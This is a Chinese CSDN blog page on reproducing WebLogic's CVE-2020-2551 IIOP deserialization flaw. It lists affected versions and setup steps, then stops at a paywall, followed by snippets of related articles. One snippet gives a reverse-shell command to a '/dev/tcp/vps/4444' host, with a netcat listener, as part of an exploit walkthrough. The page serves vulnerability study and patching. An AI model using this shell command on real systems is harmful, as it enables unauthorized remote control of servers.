Weblogic CVE-2020-2551 IIOP反序列化漏洞复现

最新推荐文章于 2024-07-15 17:36:21 发布
最新推荐文章于 2024-07-15 17:36:21 发布
阅读量1.4k 收藏
点赞数
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuandao_ahfengren/article/details/114446367
版权
本文详细介绍了Weblogic服务器的CVE-2020-2551 IIOP反序列化漏洞,包括漏洞概述、受影响的版本、环境搭建步骤、复现过程以及修复建议。攻击者可利用该漏洞通过IIOP协议执行任意代码,获取服务器权限。修复方案是升级到安全版本。
摘要由CSDN通过智能技术生成

漏洞概述

 

攻击者可以通过IIOP协议远程访问Weblogic Server服务器上的远程接口,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码。

IIOP协议以Java接口的形式对远程对象进行访问,默认启用。

 

影响版本

 

weblogic 10.3.6

weblogic 12.1.3.0

weblogic 12.2.1.3.0

weblogic 12.2.1.4.0

 

 

环境搭建

 

下载地址

https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html

 

漏洞复现

 

访问http://your-ip:7001/console看到页面

最低0.47元/天 解锁文章
玄道网安
关注
专栏目录
Weblogic CVE-2020-2551复现
迷风小白
06-02 1万+
0x00 前言 Weblogic IIOP 反序列化 0x01 漏洞环境 所有环境都是建立在java环境的基础上,jdk自行下载安装,本机环境jdk 1.8 环境1:vulub-weblogic-CVE-2017-10271 环境2:本地搭建Windows weblogic下载 weblogic 10.3.6安装步骤 搭建完成以后,启动weblogic访问如下图所示即为搭建成功 0x02 漏洞利用 这里我们采用环境2在本地搭建 win7:192.168.111.18(虚拟机) win10:192.168
Weblogic IIOP反序列化漏洞CVE-2020-2551漏洞复现
sechelper的博客
01-11 1332
cve漏洞详细复现漏洞利用,反弹shell,工具分享
Weblogic IIOP协议反序列化CVE-2020-2551漏洞复现
Boom!脑洞大爆炸的博客
11-11 2221
Weblogic IIOP协议反序列化CVE-2020-2551复现
web反序列化漏洞原理/Weblogic IIOP反序列化漏洞CVE-2020-2551漏洞分析_新手白客教学
最新发布
程序员六七的博客
07-15 1063
安全客 - 安全资讯平台
weblogic 反序列化CVE-2020-2551漏洞复现(vulfocus)
qq_40646572的博客
04-27 2402
weblogic 反序列化CVE-2020-2551漏洞是基于IIOP协议执行远程代码进行利用。
Weblogic CVE-2020-2551 IIOP反序列化漏洞复现
qq_30302577的博客
04-01 7703
文章目录前言0x01 漏洞说明0x02 影响版本:0x03 Weblogic环境搭建0x04 漏洞利用0x05 漏洞修复方案1.使用 Oracle 官方安全补丁进行更新修复2.如果不依赖T3协议进行JVM通信,用户可通过控制T3协议的访问来临时阻断针对该漏洞的攻击。0x06 参考链接 前言 本教程及工具仅供技术学习交流、请勿用于非法行为、否则后果自负 0x01 漏洞说明 2020年1月15日,O...
CVE-2020-14644 iiop反序列化漏洞分析1
08-03
CVE-2020-14644:WebLogic IIOP反序列化漏洞详解》 CVE-2020-14644是一个针对Oracle WebLogic Server的严重安全漏洞,它涉及到IIOP(Internet Inter-ORB Protocol)协议中的反序列化问题。此漏洞主要影响了Oracle...
Weblogic RMI-IIOP(cve-2020-2551)复现
hibari_18的博客
04-29 1526
0x01 复现 RMI方式: 1.vps 生成exp.class(示例为windows弹计算器,如果想反弹linux shell 把命令改成bash -i >& /dev/tcp/vps/4444 0>&1,然后vps用nc -lvvp 4444 监听本地端口即可,用java1.6版本编译成功率高) javac -source 1.6 -target 1.6 exp...
Weblogic IIOP反序列化漏洞CVE-2020-2551漏洞分析
whatday的专栏
07-09 5391
0x00 前言 2020年1月15日, Oracle官方发布了CVE-2020-2551漏洞通告,漏洞等级为高危,CVVS评分为9.8分,漏洞利用难度低。影响范围为10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0。 0x01 漏洞分析 从Oracle 官方的CPU公告中可以看出该漏洞存在于weblogic核心组件,影响的协议IIOP。其实经过分析发现,该漏洞原理上类似于RMI反序列化漏洞CVE-2017-3241),和之前的T3协议所引发的一系列.
Weblogic IIOP反序列化漏洞CVE-2020-2551
chaojixiaojingang
01-08 2182
1.漏洞描述 Weblogic IIOP反序列化漏洞影响的协议IIOP协议,该漏洞是由于调用远程对象的实现存在缺陷,导致序列化对象可以任意构造,在使用之前未经安全检查,攻击者可以通过 IIOP 协议远程访问 Weblogic Server 服务器上的远程接口传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码。 2.影响版本 10.3.6.0.0 12.1.3.0.0 12.2.1.3.0 12.2.1.4.0 3.漏洞环境搭建 所有环境都是建立在java环境...
CVE-2020-2551.zip
08-28
CVE-2020-2551复现
jrmp协议_从0学习WebLogic CVE20202551漏洞
weixin_33796288的博客
01-14 244
最近遇到的实际环境为weblogic,所以这里顺便总结下测2020-2551的一些相关的点2551也是学习了很多优秀的师傅文章,非常感谢0X00 漏洞利用基础学习从0开始学习复现这个洞不免又会设计到Java反序列化漏洞中那些老生常谈的名词理解,涉及到Java反序列化中的一些协议、行为、结构,但个人文中偏向于结果导向,对于涉及的上述名词解释不会过多官方解释,直接说上自己认为最简单的理解,如有偏差望师...
Weblogic 反序列化漏洞历史
weixin_34319999的博客
08-10 421
Weblogic 反序列化漏洞历史 0x00 weblogic简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器Weblogic 直接反序列化漏洞回顾 1. CVE-2015-4852 利用Java反序列...
漏洞复现WebLogic反序列化远程代码执行漏洞(cve-2020-2555)
HCIEMAYU的博客
07-17 321
WebLogic是Oracle推出的application server,是Web应用系统必不可少的组件,其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性强、快速开发等多种特性。大多数未及时更新的Weblogic组件存在严重的漏洞,导致其成为攻击者攻击的重点目标。,将java版本切换至jdk1.8(如果切换不成功,用root权限尝试切换一下试试)配置页面中,进入安全选项卡页面,点击筛选器,配置筛选器。4、输入URL,回显选择FileOutputStream,进行漏洞验证。
Web安全高级漏洞挖掘班 第二期 开班啦~
Ms08067安全实验室
11-05 553
文章来源|MS08067 Web安全高级漏洞挖掘班8.23号我们开启了“Web安全高级攻防实战班”第一期,感谢广大学员的支持,第一期班有收获也有不足,今天第二期又如约而至了!根据第一期班同...
漫谈-Weblogic-CVE-2020-2551
Ms08067安全实验室
05-01 4784
背景 2020 年 1月14日,Oracle 发布了大量安全补丁,修复了 43 个严重漏洞,CVSS 评分均在在9.1以上。其中 CVE-2020-2551 漏洞,互联网中公布...
weblogic反序列化CVE-2020-2555漏洞分析
weixin_45682070的博客
03-18 4687
前言 CVE-2020-2555主要源于在coherence.jar存在着用于gadget构造的类(反序列化构造类),并且利用weblogic默认存在的T3协议进行传输和解析进而导致weblogic服务器反序列化恶意代码最后执行攻击语句。 Oracle Coherence组件默认集成在Weblogic12c及以上版本中。 ...
CVE-2020-14644:WebLogic IIOP反序列化漏洞深度解析
"CVE-2020-14644是一个针对Oracle WebLogic ServerIIOP(Internet Inter-ORB Protocol)反序列化漏洞,主要影响12.2.1.3.0, 12.2.1.4.0, 和14.1.1.0.0这几个版本。该漏洞允许攻击者通过精心构造的恶意输入来触发...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值